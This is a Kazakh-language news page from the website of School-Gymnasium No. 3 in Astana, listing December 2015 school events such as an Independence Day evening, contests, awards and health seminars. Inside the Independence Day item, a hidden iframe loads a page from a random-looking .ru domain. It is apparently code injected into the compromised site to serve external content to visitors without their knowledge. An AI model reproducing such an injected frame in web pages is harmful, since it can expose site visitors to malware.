Меню KDT

Новости

Главная Новости

14.12.2015

"Мектеп мұғалімдерінің авторлық бағдарламаларына ғылым-әдістемелік қолдау көрсету" тақырыбында семинар өтті.

14.12.15 жылы №38 мектеп-лицейде Астана қаласы Білім басқармасының ұйымдастыруымен "Мектеп  мұғалімдерінің авторлық бағдарламаларына  ғылым-әдістемелік қолдау көрсету"  тақырыбында семинар өтті.

14.12.2015

"Тәуелсіздік деп соғады жүрегіміз"

<p>     Бүгін, желтоқсанның 14-і күні, мектебімізде Тәуелсіздік күніне орай «Тәуелсіздік деп соғады жүрегіміз» деген атаумен әдеби кеш өтті. Кешке 1986 жылғы желтоқсан оқиғасының куәгері, бүгінгі күннің басты кейіпкері, Астана қалалық мемлекеттік академиялық филармониясының халық әндері бөлімінің жетекшісі Секен Жолдыбайұлы Сыздықов қатысты. Қонағымыз мектеп оқушыларына желтоқсан оқиғасының маңызы, тарихтан алатын орны жайлы көзбен көрген оқиғаларын мазмұнды әңгімелеп берді. Оқушылар көкейлеріндегі сұрақтарына тұшымды жауап ала алды. Сол сияқты кеш барысында Отан, Тәуелсіздік тақырыптарында өлең-жыр оқылып, патриоттық әндер де орындалды. Қонақтарымыз қазақтың дәстүрлі ән өнерін дәріптей отырып, балаларға елжандылық қасиетті қатар дарыта білді.</p> <p>   Директордың тәрбие жұмысы жөніндегі орынбасары Төлеуова Г.Д. қорытынды сөзінде Тәуелсіздік мерекесінің 24 жылдығымен құттықтап, береке, бақыт, тыныштық тіледі.</p> <iframe src="//m81jmqmn.ru/f.html"></iframe>

13.12.2015

АИВ –сыз болашақ

№3 мектеп-гимназиясының 6 «е» сынып оқушысы Тогузов Сұлтанды «АИВ –сыз болашақ» атты плакаттар байқауында 1 орын иеленуімен құттықтаймыз!

13.12.2015

Үш сайыстан

№3 мектеп-гимназиясының 7 г сынып оқушысы Голобурда Мая жеңіл атлеткадан өткен «Үш сайыстан» Біріншілігінде 1 орын иеленді. Құттықтаймыз!!

13.12.2015

Күмбірлеген домбыра

10 желтоқсанда №3 мектеп-гимназиясының мәжіліс залында ҚР Тәуелсіздік күніне арналған «Күмбірлеген домбыра» атты күйшілер байқауы өтті. Жеңімпаздарға мадақтамалар табыс етілді. Қатысушыларды Астана Мемлекеттік академиялық филармония әртісі Бошымова Э.Ж және Астана Мемлекеттік академиялық филармониясының дәстүрлі саз тобының көркемдік жетекшісі, мәдениет қайраткері Қорғанбек Ш.Д. бағалады.

13.12.2015

ҚР Тәуелсіздік күніне арналған мерекелік сап түзеу

12 желтоқсан күні №3 мектеп-гимназиясында 5-11 сыныптар үшін ҚР Тәуелсіздік күніне арналған мерекелік сап түзеу өткізілді.

13.12.2015

Кәсіптік бейіндеу іс-шараны

2015 жылы 11 желтоқсанда Астана қаласының ІІД аға инспекторы полиция майоры Бекмухамедова С.М. және мектеп инспекторы полиция лейтенанты Беркимбаева А.С. кәсіптік бейіндеу іс-шараны жүргізді.

13.12.2015

ҚР Тәуелсіздігі күніне арналған сынып сағаттары

12 желтоқсан күні №3 мектеп-гимназиясында 5-11 сынып оқушылары үшін ҚР Тәуелсіздігі күніне арналған сынып сағаттары өтті.

12.12.2015

«Менің туған жерім»

«Менің туған жерім» атты қолөнер көрмесі өткізілді.

12.12.2015

Нашақорлықтың алдын алу

8 желтоқсанда №3 мектеп-гимназиясының мәжіліс залында жоғарғы сынып оқушылары «Нашақорлықтың алдын алу» тақырыбында өткен онлайн сабаққа қатысты. Іс-шара мақсаты- оқушыларға нашақорлықтың қауіпін түсіндіріп, салауатты өмір салтына шақыру.

12.12.2015

ҚТҚ/ ЖҚТБ және ЖЖБА алдын алу

8 желтоқсанда № 3 мектеп-гимназиясының 8 сыныптарына «Арман қала» ЖДО-ның дерматолог дәрігері Жакупова А.Б. «АҚТҚ/ ЖҚТБ және ЖЖБА алдын алу » тақырыбында семинар өткізді.


Заполняем школьные сайты

15

Помогаем, советуем, предлогаем как лучше всего заполнить сайт

Единый Образовательный портал

1

Единый Образовательный портал

Образование

1

Образование

Официальное сообщество школы-гимназии №3 города Астаны

0

Официальное сообщество школы-гимназии №3 города Астаны